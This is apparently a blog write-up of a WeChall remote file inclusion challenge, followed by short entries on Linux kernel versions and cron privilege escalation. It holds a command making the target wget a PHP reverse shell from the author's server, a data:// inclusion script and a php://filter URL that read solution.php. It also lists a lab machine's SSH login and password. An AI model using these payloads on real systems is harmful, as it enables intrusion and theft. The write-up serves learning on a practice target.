Start a Python HTTP server locally and serve a PHP reverse-shell script from it.

curl http://rfi.warchall.net/temp/payload.php?cmd=wget http://vps's IP:8080/php-reverse-shell.php -P /tmp/whale.php

The target did fetch php-reverse-shell.php from the VPS, but whale.php was not written.
---
http://rfi.warchall.net/temp/payload.php?cmd=ls /tmp/whale.php

No shell was written to /tmp. The cause may be insufficient privileges. Two things to rule out first, though: wget's -P is a directory prefix, so even a successful download would land at /tmp/whale.php/php-reverse-shell.php rather than at the path ls is looking for (-O /tmp/whale.php names the output file), and the unquoted curl URL contains spaces, so the shell splits it into several arguments; quote it and URL-encode the cmd value.

Writeup (someone else's solution)

import requests

url = "http://rfi.warchall.net/index.php"

# data:// wrapper: the "file" being included is the PHP code carried in the URL itself
params = {
    "lang": "data://text/plain,<?php print file_get_contents('solution.php',true);?>"
}

r = requests.get(url, params=params, verify=False)
print(r.content)

What is this doing?

It visits http://rfi.warchall.net/index.php?lang=data://text/plain,<?php print file_get_contents('solution.php',true);?> so that the data:// wrapper supplies the "file" to be included, and the included PHP prints solution.php.

For me it failed anyway: I did not get the contents of solution.php. (PHP gates the data:// wrapper behind the same allow_url_include setting as remote URLs, so include() of a data: URL only works where that is On; php://filter is not subject to that setting.) Use another pseudo-protocol instead, php://filter:

http://rfi.warchall.net/index.php?lang=php://filter/convert.base64-encode/resource=/home/level/15_live_rfi/www/solution.php

echo PGh0bWw+Cjxib2R5Pgo8cHJlPk5PVEhJTkcgSEVSRT8/Pz88L3ByZT4KPC9ib2R5Pgo8L2h0bWw+CgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8P3BocCByZXR1cm4gJ0xvd19INE5HSU5HX0ZydWl0JzsgPz4K | base64 -d

This also recovers solution.php.

Summary

The challenge authors certainly would not allow writing a shell or getting a reverse shell, otherwise the server's stability would suffer; someone might write junk data until the disk is full, and so on.

The difference between RFI and LFI is that remote file inclusion is more dangerous: it includes a file the attacker specifies.

Here, if http://rfi.warchall.net/temp/payload.php?cmd=wget http://vps's IP:8080/php-reverse-shell.php -P /tmp/whale.php had had write permission, it would have given a shell. With local file inclusion one generally has to upload a shell through a file-upload feature first and then execute it via the inclusion, whereas RFI needs no upload.

However, payload.php here looks like a remote command execution vulnerability, not an RFI. Other people's writeups use the data pseudo-protocol to read the flag, but that still looks like an LFI. Perhaps the challenge was not set well. (Strictly, the data:// route is the "remote" inclusion the challenge is named after: PHP only allows including a data: URL when allow_url_include is On, the same switch an http:// inclusion needs.)

The challenge does not really make the solver feel the difference between RFI and LFI; it only exercises the pseudo-protocol knowledge point.

References

浅谈文件包含漏洞 (A brief discussion of file inclusion vulnerabilities)


Linux kernel upgrade & downgrade

Posted on 2020-11-30 | Category: linux

Introduction

Linux scheduled-task (cron) privilege escalation

Posted on 2020-11-29 | Category: linux

Target machine:
ssh user@192.168.28.131
password123

Relative vs absolute paths in scheduled tasks
whale

Aimed at Pro Penetration tester. Email me "weaponmaster3070@gmail.com"

© 2021 whale